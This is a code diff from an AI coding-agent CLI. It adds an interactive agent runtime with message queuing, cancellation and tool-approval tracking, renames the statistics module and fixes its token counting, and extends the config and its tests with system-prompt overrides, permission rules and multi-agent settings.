+ * + * Three-level cancellation: + * - `cancelCurrentRound()` — abort the current reasoning loop only + * - `shutdown()` — graceful: stop accepting messages, wait for cycle + * - `abort()` — immediate: master abort, set cancelled + */ +export class AgentInteractive { + readonly config: AgentInteractiveConfig; + private readonly core: AgentCore; + private readonly queue = new AsyncMessageQueue(); + private readonly messages: AgentMessage[] = []; + + private status: AgentStatus = AgentStatus.INITIALIZING; + private error: string | undefined; + private lastRoundError: string | undefined; + private executionPromise: Promise | undefined; + private masterAbortController = new AbortController(); + private roundAbortController: AbortController | undefined; + private chat: GeminiChat | undefined; + private toolsList: FunctionDeclaration[] = []; + private processing = false; + private roundCancelledByUser = false; + + // Pending tool approval requests. Keyed by callId. + // Populated by TOOL_WAITING_APPROVAL, removed by TOOL_RESULT or when + // the user responds. The UI reads this to show confirmation dialogs. + private readonly pendingApprovals = new Map< + string, + ToolCallConfirmationDetails + >(); + + // Live streaming output for currently-executing tools. Keyed by callId. + // Populated by TOOL_OUTPUT_UPDATE (replaces previous), cleared on TOOL_RESULT. + // The UI reads this via getLiveOutputs() to show real-time stdout. + private readonly liveOutputs = new Map(); + + // PTY PIDs for currently-executing shell tools. Keyed by callId. + // Populated by TOOL_OUTPUT_UPDATE when pid is present, cleared on TOOL_RESULT. + // The UI reads this via getShellPids() to enable interactive shell input. + private readonly shellPids = new Map(); + + constructor(config: AgentInteractiveConfig, core: AgentCore) { + this.config = config; + this.core = core; + this.setupEventListeners(); + } + + // ─── Lifecycle ────────────────────────────────────────────── + + /** + * Start the agent. 
Initializes the chat session, then kicks off + * processing if an initialTask is configured. + */ + async start(context: ContextState): Promise { + this.setStatus(AgentStatus.INITIALIZING); + + this.chat = await this.core.createChat(context, { + interactive: true, + extraHistory: this.config.chatHistory, + }); + if (!this.chat) { + this.error = 'Failed to create chat session'; + this.setStatus(AgentStatus.FAILED); + return; + } + + this.toolsList = this.core.prepareTools(); + this.core.stats.start(Date.now()); + + if (this.config.chatHistory?.length) { + this.addMessage( + 'info', + `History context from parent session included (${this.config.chatHistory.length} messages)`, + ); + } + + if (this.config.initialTask) { + this.queue.enqueue(this.config.initialTask); + this.executionPromise = this.runLoop(); + } + } + + /** + * Run loop: process all pending messages, then settle status. + * Exits when the queue is empty or the agent is aborted. + */ + private async runLoop(): Promise { + this.processing = true; + try { + let message = this.queue.dequeue(); + while (message !== null && !this.masterAbortController.signal.aborted) { + this.addMessage('user', message); + await this.runOneRound(message); + message = this.queue.dequeue(); + } + + if (this.masterAbortController.signal.aborted) { + this.setStatus(AgentStatus.CANCELLED); + } else { + this.settleRoundStatus(); + } + } catch (err) { + this.error = err instanceof Error ? err.message : String(err); + this.setStatus(AgentStatus.FAILED); + debugLogger.error('AgentInteractive processing failed:', err); + } finally { + this.processing = false; + } + } + + /** + * Run a single reasoning round for one message. + * Creates a per-round AbortController so cancellation is scoped. 
+ */ + private async runOneRound(message: string): Promise { + if (!this.chat) return; + + this.setStatus(AgentStatus.RUNNING); + this.lastRoundError = undefined; + this.roundCancelledByUser = false; + this.roundAbortController = new AbortController(); + + // Propagate master abort to round + const onMasterAbort = () => this.roundAbortController?.abort(); + this.masterAbortController.signal.addEventListener('abort', onMasterAbort); + if (this.masterAbortController.signal.aborted) { + this.roundAbortController.abort(); + } + + try { + const initialMessages = [ + { role: 'user' as const, parts: [{ text: message }] }, + ]; + + const result = await this.core.runReasoningLoop( + this.chat, + initialMessages, + this.toolsList, + this.roundAbortController, + { + maxTurns: this.config.maxTurnsPerMessage, + maxTimeMinutes: this.config.maxTimeMinutesPerMessage, + }, + ); + + // Surface non-normal termination as a visible info message and as + // lastRoundError so Arena can distinguish limit stops from successes. + if ( + result.terminateMode && + result.terminateMode !== AgentTerminateMode.GOAL + ) { + const msg = terminateModeMessage(result.terminateMode); + if (msg) { + this.addMessage('info', msg.text, { metadata: { level: msg.level } }); + } + this.lastRoundError = `Terminated: ${result.terminateMode}`; + } + } catch (err) { + // User-initiated cancellation already logged by cancelCurrentRound(). + if (this.roundCancelledByUser) return; + // Agent survives round errors — log and settle status in runLoop. + const errorMessage = err instanceof Error ? 
err.message : String(err); + this.lastRoundError = errorMessage; + debugLogger.error('AgentInteractive round error:', err); + this.addMessage('info', errorMessage, { metadata: { level: 'error' } }); + } finally { + this.masterAbortController.signal.removeEventListener( + 'abort', + onMasterAbort, + ); + this.roundAbortController = undefined; + } + } + + // ─── Cancellation ────────────────────────────────────────── + + /** + * Cancel only the current reasoning round. + * Adds a visible "cancelled" info message and clears pending approvals. + */ + cancelCurrentRound(): void { + this.roundCancelledByUser = true; + this.roundAbortController?.abort(); + this.pendingApprovals.clear(); + this.addMessage('info', 'Agent round cancelled.', { + metadata: { level: 'warning' }, + }); + } + + /** + * Graceful shutdown: stop accepting messages and wait for current + * processing to finish. + */ + async shutdown(): Promise { + this.queue.drain(); + if (this.executionPromise) { + await this.executionPromise; + } + // If no processing cycle ever ran (no initialTask, no messages), + // ensure the agent reaches a terminal status. + if (!isTerminalStatus(this.status)) { + this.setStatus(AgentStatus.COMPLETED); + } + } + + /** + * Immediate abort: cancel everything and set status to cancelled. + */ + abort(): void { + this.masterAbortController.abort(); + this.queue.drain(); + this.pendingApprovals.clear(); + } + + // ─── Message Queue ───────────────────────────────────────── + + /** + * Enqueue a message for the agent to process. 
+ */ + enqueueMessage(message: string): void { + this.queue.enqueue(message); + if (!this.processing) { + this.executionPromise = this.runLoop(); + } + } + + // ─── State Accessors ─────────────────────────────────────── + + getMessages(): readonly AgentMessage[] { + return this.messages; + } + + getStatus(): AgentStatus { + return this.status; + } + + getError(): string | undefined { + return this.error; + } + + getLastRoundError(): string | undefined { + return this.lastRoundError; + } + + getStats(): AgentStatsSummary { + return this.core.getExecutionSummary(); + } + + /** The prompt token count from the most recent model call. */ + getLastPromptTokenCount(): number { + return this.core.lastPromptTokenCount; + } + + getCore(): AgentCore { + return this.core; + } + + getEventEmitter(): AgentEventEmitter | undefined { + return this.core.getEventEmitter(); + } + + /** + * Returns tool calls currently awaiting user approval. + * Keyed by callId → full ToolCallConfirmationDetails (with onConfirm). + * The UI reads this to render confirmation dialogs inside ToolGroupMessage. + */ + getPendingApprovals(): ReadonlyMap { + return this.pendingApprovals; + } + + /** + * Returns live output for currently-executing tools. + * Keyed by callId → latest ToolResultDisplay (replaces on each update). + * Entries are cleared when TOOL_RESULT arrives for the call. + */ + getLiveOutputs(): ReadonlyMap { + return this.liveOutputs; + } + + /** + * Returns PTY PIDs for currently-executing interactive shell tools. + * Keyed by callId → PID. Populated from TOOL_OUTPUT_UPDATE when pid is + * present; cleared when TOOL_RESULT arrives. The UI uses this to enable + * interactive shell input via HistoryItemDisplay's activeShellPtyId prop. + */ + getShellPids(): ReadonlyMap { + return this.shellPids; + } + + /** + * Wait for the run loop to finish (used by InProcessBackend). 
+ */ + async waitForCompletion(): Promise { + if (this.executionPromise) { + await this.executionPromise; + } + } + + // ─── Private Helpers ─────────────────────────────────────── + + /** + * Settle status after the run loop empties. + * On success → IDLE (agent stays alive for follow-up messages). + * On error → FAILED (terminal). + */ + private settleRoundStatus(): void { + if (this.lastRoundError && !this.roundCancelledByUser) { + this.setStatus(AgentStatus.FAILED); + } else { + this.setStatus(AgentStatus.IDLE); + } + } + + private setStatus(newStatus: AgentStatus): void { + const previousStatus = this.status; + if (previousStatus === newStatus) return; + + this.status = newStatus; + + this.core.eventEmitter?.emit(AgentEventType.STATUS_CHANGE, { + agentId: this.config.agentId, + previousStatus, + newStatus, + roundCancelledByUser: this.roundCancelledByUser || undefined, + timestamp: Date.now(), + }); + } + + private addMessage( + role: AgentMessage['role'], + content: string, + options?: { thought?: boolean; metadata?: Record }, + ): void { + const message: AgentMessage = { + role, + content, + timestamp: Date.now(), + }; + if (options?.thought) { + message.thought = true; + } + if (options?.metadata) { + message.metadata = options.metadata; + } + this.messages.push(message); + } + + private setupEventListeners(): void { + const emitter = this.core.eventEmitter; + if (!emitter) return; + + emitter.on(AgentEventType.ROUND_TEXT, (event: AgentRoundTextEvent) => { + if (event.thoughtText) { + this.addMessage('assistant', event.thoughtText, { thought: true }); + } + if (event.text) { + this.addMessage('assistant', event.text); + } + }); + + emitter.on(AgentEventType.TOOL_CALL, (event: AgentToolCallEvent) => { + this.addMessage('tool_call', `Tool call: ${event.name}`, { + metadata: { + callId: event.callId, + toolName: event.name, + args: event.args, + description: event.description, + renderOutputAsMarkdown: event.isOutputMarkdown, + round: event.round, + }, + }); + 
}); + + emitter.on( + AgentEventType.TOOL_OUTPUT_UPDATE, + (event: AgentToolOutputUpdateEvent) => { + this.liveOutputs.set(event.callId, event.outputChunk); + if (event.pid !== undefined) { + this.shellPids.set(event.callId, event.pid); + } + }, + ); + + emitter.on(AgentEventType.TOOL_RESULT, (event: AgentToolResultEvent) => { + this.liveOutputs.delete(event.callId); + this.shellPids.delete(event.callId); + this.pendingApprovals.delete(event.callId); + + const statusText = event.success ? 'succeeded' : 'failed'; + const summary = event.error + ? `Tool ${event.name} ${statusText}: ${event.error}` + : `Tool ${event.name} ${statusText}`; + this.addMessage('tool_result', summary, { + metadata: { + callId: event.callId, + toolName: event.name, + success: event.success, + resultDisplay: event.resultDisplay, + outputFile: event.outputFile, + round: event.round, + }, + }); + }); + + emitter.on( + AgentEventType.TOOL_WAITING_APPROVAL, + (event: AgentApprovalRequestEvent) => { + const fullDetails = { + ...event.confirmationDetails, + onConfirm: async ( + outcome: Parameters[0], + payload?: Parameters[1], + ) => { + this.pendingApprovals.delete(event.callId); + // Nudge the UI to re-render so the tool transitions visually + // from Confirming → Executing without waiting for the first + // real TOOL_OUTPUT_UPDATE from the tool's execution. + this.core.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.core.subagentId, + round: event.round, + callId: event.callId, + outputChunk: '', + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + await event.respond(outcome, payload); + // When the user denies a tool, cancel the round immediately + // so the agent doesn't waste a turn "acknowledging" the denial. 
+ if (outcome === ToolConfirmationOutcome.Cancel) { + this.cancelCurrentRound(); + } + }, + } as ToolCallConfirmationDetails; + + this.pendingApprovals.set(event.callId, fullDetails); + }, + ); + } +} + +/** + * Map a non-GOAL terminate mode to a visible status message for the UI, + * or return null to suppress the message entirely. + * + * CANCELLED is suppressed here because cancelCurrentRound() already emits + * its own warning. SHUTDOWN is suppressed as a normal lifecycle end. + */ +function terminateModeMessage( + mode: AgentTerminateMode, +): { text: string; level: 'info' | 'warning' | 'error' } | null { + switch (mode) { + case AgentTerminateMode.MAX_TURNS: + return { + text: 'Agent stopped: maximum turns reached.', + level: 'warning', + }; + case AgentTerminateMode.TIMEOUT: + return { text: 'Agent stopped: time limit reached.', level: 'warning' }; + case AgentTerminateMode.ERROR: + return { text: 'Agent stopped due to an error.', level: 'error' }; + case AgentTerminateMode.CANCELLED: + case AgentTerminateMode.SHUTDOWN: + return null; + default: + return null; + } +} diff --git a/packages/core/src/subagents/subagent-statistics.test.ts b/packages/core/src/agents/runtime/agent-statistics.test.ts similarity index 92% rename from packages/core/src/subagents/subagent-statistics.test.ts rename to packages/core/src/agents/runtime/agent-statistics.test.ts index 39ba70aa4..ec9f6e990 100644 --- a/packages/core/src/subagents/subagent-statistics.test.ts +++ b/packages/core/src/agents/runtime/agent-statistics.test.ts @@ -5,14 +5,14 @@ */ import { describe, it, expect, beforeEach } from 'vitest'; -import { SubagentStatistics } from './subagent-statistics.js'; +import { AgentStatistics } from './agent-statistics.js'; -describe('SubagentStatistics', () => { - let stats: SubagentStatistics; +describe('AgentStatistics', () => { + let stats: AgentStatistics; const baseTime = 1000000000000; // Fixed timestamp for consistent testing beforeEach(() => { - stats = new 
SubagentStatistics(); + stats = new AgentStatistics(); }); describe('basic statistics tracking', () => { @@ -57,7 +57,23 @@ describe('SubagentStatistics', () => { const summary = stats.getSummary(); expect(summary.thoughtTokens).toBe(10); expect(summary.cachedTokens).toBe(5); - expect(summary.totalTokens).toBe(165); // 100 + 50 + 10 + 5 + // cachedTokens is a subset of inputTokens, not additive + expect(summary.totalTokens).toBe(160); // 100 + 50 + 10 + }); + + it('should use API-provided totalTokenCount when available', () => { + stats.recordTokens(100, 50, 10, 5, 170); + + const summary = stats.getSummary(); + expect(summary.totalTokens).toBe(170); + }); + + it('should accumulate API totalTokenCount across rounds', () => { + stats.recordTokens(100, 50, 0, 0, 150); + stats.recordTokens(200, 80, 0, 0, 280); + + const summary = stats.getSummary(); + expect(summary.totalTokens).toBe(430); // 150 + 280 }); }); @@ -109,7 +125,7 @@ describe('SubagentStatistics', () => { expect(result).toContain('📋 Task Completed: Test task'); expect(result).toContain('🔧 Tool Usage: 1 calls, 100.0% success'); expect(result).toContain('⏱️ Duration: 5.0s | 🔁 Rounds: 2'); - expect(result).toContain('🔢 Tokens: 1,530 (in 1000, out 500)'); + expect(result).toContain('🔢 Tokens: 1,520 (in 1000, out 500)'); }); it('should handle zero tool calls', () => { diff --git a/packages/core/src/subagents/subagent-statistics.ts b/packages/core/src/agents/runtime/agent-statistics.ts similarity index 95% rename from packages/core/src/subagents/subagent-statistics.ts rename to packages/core/src/agents/runtime/agent-statistics.ts index 72308c633..55c16f529 100644 --- a/packages/core/src/subagents/subagent-statistics.ts +++ b/packages/core/src/agents/runtime/agent-statistics.ts @@ -14,7 +14,7 @@ export interface ToolUsageStats { averageDurationMs: number; } -export interface SubagentStatsSummary { +export interface AgentStatsSummary { rounds: number; totalDurationMs: number; totalToolCalls: number; @@ -26,11 
+26,10 @@ export interface SubagentStatsSummary { thoughtTokens: number; cachedTokens: number; totalTokens: number; - estimatedCost: number; toolUsage: ToolUsageStats[]; } -export class SubagentStatistics { +export class AgentStatistics { private startTimeMs = 0; private rounds = 0; private totalToolCalls = 0; @@ -40,6 +39,7 @@ export class SubagentStatistics { private outputTokens = 0; private thoughtTokens = 0; private cachedTokens = 0; + private apiTotalTokens = 0; private toolUsage = new Map(); start(now = Date.now()) { @@ -83,14 +83,16 @@ export class SubagentStatistics { output: number, thought: number = 0, cached: number = 0, + total: number = 0, ) { this.inputTokens += Math.max(0, input || 0); this.outputTokens += Math.max(0, output || 0); this.thoughtTokens += Math.max(0, thought || 0); this.cachedTokens += Math.max(0, cached || 0); + this.apiTotalTokens += Math.max(0, total || 0); } - getSummary(now = Date.now()): SubagentStatsSummary { + getSummary(now = Date.now()): AgentStatsSummary { const totalDurationMs = this.startTimeMs ? now - this.startTimeMs : 0; const totalToolCalls = this.totalToolCalls; const successRate = @@ -98,11 +100,9 @@ export class SubagentStatistics { ? (this.successfulToolCalls / totalToolCalls) * 100 : 0; const totalTokens = - this.inputTokens + - this.outputTokens + - this.thoughtTokens + - this.cachedTokens; - const estimatedCost = this.inputTokens * 3e-5 + this.outputTokens * 6e-5; + this.apiTotalTokens > 0 + ? 
this.apiTotalTokens + : this.inputTokens + this.outputTokens + this.thoughtTokens; return { rounds: this.rounds, totalDurationMs, @@ -115,7 +115,6 @@ export class SubagentStatistics { thoughtTokens: this.thoughtTokens, cachedTokens: this.cachedTokens, totalTokens, - estimatedCost, toolUsage: Array.from(this.toolUsage.values()), }; } @@ -217,7 +216,7 @@ export class SubagentStatistics { return `${h}h ${m}m`; } - private generatePerformanceTips(stats: SubagentStatsSummary): string[] { + private generatePerformanceTips(stats: AgentStatsSummary): string[] { const tips: string[] = []; const totalCalls = stats.totalToolCalls; const sr = diff --git a/packages/core/src/agents/runtime/agent-types.ts b/packages/core/src/agents/runtime/agent-types.ts new file mode 100644 index 000000000..d1204098a --- /dev/null +++ b/packages/core/src/agents/runtime/agent-types.ts @@ -0,0 +1,198 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Agent runtime types. + * + * Contains the canonical definitions for agent configuration (prompt, model, + * run, tool), termination modes, and interactive agent types. + */ + +import type { Content, FunctionDeclaration } from '@google/genai'; + +// ─── Agent Configuration ───────────────────────────────────── + +/** + * Configures the initial prompt for an agent. + */ +export interface PromptConfig { + /** + * A single system prompt string that defines the agent's persona and instructions. + * Note: You should use either `systemPrompt` or `initialMessages`, but not both. + */ + systemPrompt?: string; + + /** + * An array of user/model content pairs to seed the chat history for few-shot prompting. + * Note: You should use either `systemPrompt` or `initialMessages`, but not both. + */ + initialMessages?: Content[]; +} + +/** + * Configures the generative model parameters for an agent. 
+ */ +export interface ModelConfig { + /** + * The name or identifier of the model to be used (e.g., 'qwen3-coder-plus'). + * + * TODO: In the future, this needs to support 'auto' or some other string to support routing use cases. + */ + model?: string; + /** The temperature for the model's sampling process. */ + temp?: number; + /** The top-p value for nucleus sampling. */ + top_p?: number; +} + +/** + * Configures the execution environment and constraints for an agent. + * + * TODO: Consider adding max_tokens as a form of budgeting. + */ +export interface RunConfig { + /** The maximum execution time for the agent in minutes. */ + max_time_minutes?: number; + /** + * The maximum number of conversational turns (a user message + model response) + * before the execution is terminated. Helps prevent infinite loops. + */ + max_turns?: number; +} + +/** + * Configures the tools available to an agent during its execution. + */ +export interface ToolConfig { + /** + * A list of tool names (from the tool registry) or full function declarations + * that the agent is permitted to use. + */ + tools: Array; +} + +/** + * Describes the possible termination modes for an agent. + * This enum provides a clear indication of why an agent's execution ended. + */ +export enum AgentTerminateMode { + /** The agent's execution terminated due to an unrecoverable error. */ + ERROR = 'ERROR', + /** The agent's execution terminated because it exceeded the maximum allowed working time. */ + TIMEOUT = 'TIMEOUT', + /** The agent's execution successfully completed all its defined goals. */ + GOAL = 'GOAL', + /** The agent's execution terminated because it exceeded the maximum number of turns. */ + MAX_TURNS = 'MAX_TURNS', + /** The agent's execution was cancelled via an abort signal. */ + CANCELLED = 'CANCELLED', + /** The agent was gracefully shut down (e.g., arena/team session ended). 
*/ + SHUTDOWN = 'SHUTDOWN', +} + +// ─── Agent Status ──────────────────────────────────────────── + +/** + * Canonical lifecycle status for any agent (headless, interactive, arena). + * + * State machine: + * INITIALIZING → RUNNING → IDLE ⇄ RUNNING → … → COMPLETED / FAILED / CANCELLED + * + * - INITIALIZING: Setting up (creating chat, loading tools). + * - RUNNING: Actively processing (model thinking / tool execution). + * - IDLE: Finished current work, waiting — can accept new messages. + * - COMPLETED: Finished for good (explicit shutdown). No further interaction. + * - FAILED: Finished with error (API failure, process crash, etc.). + * - CANCELLED: Cancelled by user or system. + */ +export enum AgentStatus { + INITIALIZING = 'initializing', + RUNNING = 'running', + IDLE = 'idle', + COMPLETED = 'completed', + FAILED = 'failed', + CANCELLED = 'cancelled', +} + +/** True for COMPLETED, FAILED, CANCELLED — agent is done for good. */ +export const isTerminalStatus = (s: AgentStatus): boolean => + s === AgentStatus.COMPLETED || + s === AgentStatus.FAILED || + s === AgentStatus.CANCELLED; + +/** True for IDLE or COMPLETED — agent finished its work successfully. */ +export const isSuccessStatus = (s: AgentStatus): boolean => + s === AgentStatus.IDLE || s === AgentStatus.COMPLETED; + +/** True for terminal statuses OR IDLE — agent has settled (not actively working). */ +export const isSettledStatus = (s: AgentStatus): boolean => + s === AgentStatus.IDLE || isTerminalStatus(s); + +/** + * Lightweight configuration for an AgentInteractive instance. + * Carries only interactive-specific parameters; the heavy runtime + * configs (prompt, model, run, tools) live on AgentCore. + */ +export interface AgentInteractiveConfig { + /** Unique identifier for this agent. */ + agentId: string; + /** Human-readable name for display. */ + agentName: string; + /** Optional initial task to start working on immediately. 
*/ + initialTask?: string; + /** Max model round-trips per enqueued message (default: unlimited). */ + maxTurnsPerMessage?: number; + /** Max wall-clock minutes per enqueued message (default: unlimited). */ + maxTimeMinutesPerMessage?: number; + /** + * Optional conversation history from a parent session to seed the + * agent's chat with prior context. + */ + chatHistory?: Content[]; +} + +/** + * A message exchanged with or produced by an interactive agent. + * + * This is a UI-oriented data model (not the Gemini API Content type). + * AgentInteractive is the sole writer; the UI reads via getMessages(). + */ +export interface AgentMessage { + /** Discriminator for the message kind. */ + role: 'user' | 'assistant' | 'tool_call' | 'tool_result' | 'info'; + /** The text content of the message. */ + content: string; + /** When the message was created (ms since epoch). */ + timestamp: number; + /** + * Whether this assistant message contains thinking/reasoning content. + * Mirrors AgentStreamTextEvent.thought. Only meaningful when role is 'assistant'. + */ + thought?: boolean; + /** + * Optional metadata. + * + * For role='info': metadata.level?: 'info' | 'warning' | 'success' | 'error' + * Controls which status message component is rendered. Defaults to 'info'. + * For role='tool_call': callId, toolName, args, description, renderOutputAsMarkdown, round + * For role='tool_result': callId, toolName, success, resultDisplay, outputFile, round + * For role='assistant' with error: error=true + */ + metadata?: Record; +} + +/** + * Snapshot of in-progress streaming state for UI mid-switch handoff. + * Returned by AgentInteractive.getInProgressStream(). + */ +export interface InProgressStreamState { + /** Accumulated non-thought text so far in the current round. */ + text: string; + /** Accumulated thinking text so far in the current round. */ + thinking: string; + /** The reasoning-loop round number being streamed. 
*/ + round: number; +} diff --git a/packages/core/src/agents/runtime/index.ts b/packages/core/src/agents/runtime/index.ts new file mode 100644 index 000000000..93ef0e5a3 --- /dev/null +++ b/packages/core/src/agents/runtime/index.ts @@ -0,0 +1,17 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Runtime barrel — re-exports agent execution primitives. + */ + +export * from './agent-types.js'; +export * from './agent-core.js'; +export * from './agent-headless.js'; +export * from './agent-interactive.js'; +export * from './agent-events.js'; +export * from './agent-statistics.js'; +export { AsyncMessageQueue } from '../../utils/asyncMessageQueue.js'; diff --git a/packages/core/src/config/config.test.ts b/packages/core/src/config/config.test.ts index 828ef9c3e..5b1e62fb5 100644 --- a/packages/core/src/config/config.test.ts +++ b/packages/core/src/config/config.test.ts @@ -36,6 +36,8 @@ import { RipGrepTool } from '../tools/ripGrep.js'; import { logRipgrepFallback } from '../telemetry/loggers.js'; import { RipgrepFallbackEvent } from '../telemetry/types.js'; import { ToolRegistry } from '../tools/tool-registry.js'; +import { fireNotificationHook } from '../core/toolHookTriggers.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; function createToolMock(toolName: string) { const ToolMock = vi.fn(); @@ -195,6 +197,10 @@ vi.mock('../ide/ide-client.js', () => ({ import { BaseLlmClient } from '../core/baseLlmClient.js'; vi.mock('../core/baseLlmClient.js'); +// Mock fireNotificationHook from toolHookTriggers +vi.mock('../core/toolHookTriggers.js', () => ({ + fireNotificationHook: vi.fn().mockResolvedValue({}), +})); describe('Server Config (config.ts)', () => { const MODEL = 'qwen3-coder-plus'; @@ -248,6 +254,26 @@ describe('Server Config (config.ts)', () => { ); }); + it('should store a system prompt override', () => { + const config = new Config({ + ...baseParams, + systemPrompt: 'You are 
a custom system prompt.', + }); + + expect(config.getSystemPrompt()).toBe('You are a custom system prompt.'); + expect(config.getAppendSystemPrompt()).toBeUndefined(); + }); + + it('should store an appended system prompt', () => { + const config = new Config({ + ...baseParams, + appendSystemPrompt: 'Be extra concise.', + }); + + expect(config.getAppendSystemPrompt()).toBe('Be extra concise.'); + expect(config.getSystemPrompt()).toBeUndefined(); + }); + describe('initialize', () => { it('should throw an error if checkpointing is enabled and GitService fails', async () => { const gitError = new Error('Git is not installed'); @@ -317,6 +343,64 @@ describe('Server Config (config.ts)', () => { expect(GeminiClient).toHaveBeenCalledWith(config); }); + it('should fire auth_success notification hook when hooks are enabled', async () => { + const mockMessageBus = { request: vi.fn() }; + const config = new Config({ + ...baseParams, + enableHooks: true, + }); + // Set messageBus using the setter + config.setMessageBus(mockMessageBus as unknown as MessageBus); + + const authType = AuthType.USE_GEMINI; + const mockContentConfig = { + apiKey: 'test-key', + model: 'qwen3-coder-plus', + authType, + }; + + vi.mocked(resolveContentGeneratorConfigWithSources).mockReturnValue({ + config: mockContentConfig as ContentGeneratorConfig, + sources: {}, + }); + + await config.refreshAuth(authType); + + // Verify that fireNotificationHook was called with correct parameters + expect(fireNotificationHook).toHaveBeenCalledWith( + mockMessageBus, + `Successfully authenticated with ${authType}`, + 'auth_success', + 'Authentication successful', + ); + }); + + it('should not fire notification hook when hooks are disabled', async () => { + const config = new Config({ + ...baseParams, + enableHooks: false, + }); + const authType = AuthType.USE_GEMINI; + const mockContentConfig = { + apiKey: 'test-key', + model: 'qwen3-coder-plus', + authType, + }; + + 
vi.mocked(resolveContentGeneratorConfigWithSources).mockReturnValue({ + config: mockContentConfig as ContentGeneratorConfig, + sources: {}, + }); + + // Clear any previous calls + vi.mocked(fireNotificationHook).mockClear(); + + await config.refreshAuth(authType); + + // Verify that fireNotificationHook was not called + expect(fireNotificationHook).not.toHaveBeenCalled(); + }); + it('should not strip thoughts when switching from Vertex to GenAI', async () => { const config = new Config(baseParams); @@ -1047,10 +1131,10 @@ describe('Server Config (config.ts)', () => { expect(config.getTruncateToolOutputThreshold()).toBe(50000); }); - it('should return infinity when truncation is disabled', () => { + it('should return infinity when threshold is zero or negative', () => { const customParams = { ...baseParams, - enableToolOutputTruncation: false, + truncateToolOutputThreshold: 0, }; const config = new Config(customParams); expect(config.getTruncateToolOutputThreshold()).toBe( diff --git a/packages/core/src/config/config.ts b/packages/core/src/config/config.ts index 3663beb8f..4cf4d9a3e 100644 --- a/packages/core/src/config/config.ts +++ b/packages/core/src/config/config.ts @@ -21,6 +21,8 @@ import type { ContentGeneratorConfigSources } from '../core/contentGenerator.js' import type { MCPOAuthConfig } from '../mcp/oauth-provider.js'; import type { ShellExecutionConfig } from '../services/shellExecutionService.js'; import type { AnyToolInvocation } from '../tools/tools.js'; +import type { ArenaManager } from '../agents/arena/ArenaManager.js'; +import { ArenaAgentClient } from '../agents/arena/ArenaAgentClient.js'; // Core import { BaseLlmClient } from '../core/baseLlmClient.js'; @@ -37,7 +39,6 @@ import { type FileSystemService, StandardFileSystemService, type FileEncodingType, - FileEncoding, } from '../services/fileSystemService.js'; import { GitService } from '../services/gitService.js'; @@ -69,6 +70,7 @@ import { ideContextStore } from '../ide/ideContext.js'; import 
{ InputFormat, OutputFormat } from '../output/types.js'; import { PromptRegistry } from '../prompts/prompt-registry.js'; import { SkillManager } from '../skills/skill-manager.js'; +import { PermissionManager } from '../permissions/permission-manager.js'; import { SubagentManager } from '../subagents/subagent-manager.js'; import type { SubagentConfig } from '../subagents/types.js'; import { @@ -92,13 +94,19 @@ import { type HookExecutionRequest, type HookExecutionResponse, } from '../confirmation-bus/types.js'; +import { + PermissionMode, + NotificationType, + type PermissionSuggestion, +} from '../hooks/types.js'; +import { fireNotificationHook } from '../core/toolHookTriggers.js'; // Utils import { shouldAttemptBrowserLaunch } from '../utils/browser.js'; import { FileExclusions } from '../utils/ignorePatterns.js'; import { shouldDefaultToNodePty } from '../utils/shell-utils.js'; import { WorkspaceContext } from '../utils/workspaceContext.js'; -import { isToolEnabled, type ToolName } from '../utils/tool-utils.js'; +import { type ToolName } from '../utils/tool-utils.js'; import { getErrorMessage } from '../utils/errors.js'; // Local config modules @@ -195,10 +203,6 @@ export interface ChatCompressionSettings { contextPercentageThreshold?: number; } -export interface SummarizeToolOutputSettings { - tokenBudget?: number; -} - export interface TelemetrySettings { enabled?: boolean; target?: TelemetryTarget; @@ -289,6 +293,26 @@ export interface SandboxConfig { image: string; } +/** + * Settings shared across multi-agent collaboration features + * (Arena, Team, Swarm). 
+ */ +export interface AgentsCollabSettings { + /** Display mode for multi-agent sessions ('in-process' | 'tmux' | 'iterm2') */ + displayMode?: string; + /** Arena-specific settings */ + arena?: { + /** Custom base directory for Arena worktrees (default: ~/.qwen/arena) */ + worktreeBaseDir?: string; + /** Preserve worktrees and state files after session ends */ + preserveArtifacts?: boolean; + /** Maximum rounds (turns) per agent. No limit if unset. */ + maxRoundsPerAgent?: number; + /** Total timeout in seconds for the Arena session. No limit if unset. */ + timeoutSeconds?: number; + }; +} + export interface ConfigParameters { sessionId?: string; sessionData?: ResumedSessionData; @@ -298,9 +322,17 @@ export interface ConfigParameters { debugMode: boolean; includePartialMessages?: boolean; question?: string; + systemPrompt?: string; + appendSystemPrompt?: string; coreTools?: string[]; allowedTools?: string[]; excludeTools?: string[]; + /** Merged permission rules from all sources (settings + CLI args). 
*/ + permissions?: { + allow?: string[]; + ask?: string[]; + deny?: string[]; + }; toolDiscoveryCommand?: string; toolCallCommand?: string; mcpServerCommand?: string; @@ -339,7 +371,6 @@ export interface ConfigParameters { allowedMcpServers?: string[]; excludedMcpServers?: string[]; noBrowser?: boolean; - summarizeToolOutput?: Record; folderTrustFeature?: boolean; folderTrust?: boolean; ideMode?: boolean; @@ -375,7 +406,6 @@ export interface ConfigParameters { skipLoopDetection?: boolean; truncateToolOutputThreshold?: number; truncateToolOutputLines?: number; - enableToolOutputTruncation?: boolean; eventEmitter?: EventEmitter; output?: OutputSettings; inputFormat?: InputFormat; @@ -386,6 +416,8 @@ export interface ConfigParameters { channel?: string; /** Model providers configuration grouped by authType */ modelProvidersConfig?: ModelProvidersConfig; + /** Multi-agent collaboration settings (Arena, Team, Swarm) */ + agents?: AgentsCollabSettings; /** Enable hook system for lifecycle events */ enableHooks?: boolean; /** Hooks configuration from settings */ @@ -394,6 +426,20 @@ export interface ConfigParameters { hooksConfig?: Record; /** Warnings generated during configuration resolution */ warnings?: string[]; + /** + * Callback for persisting a permission rule to settings. + * Injected by the CLI layer; core uses this to write allow/ask/deny rules + * to project or user settings when the user clicks "Always Allow". + * + * @param scope - 'project' for workspace settings, 'user' for user settings. + * @param ruleType - 'allow' | 'ask' | 'deny'. + * @param rule - The raw rule string, e.g. "Bash(git *)" or "Edit". 
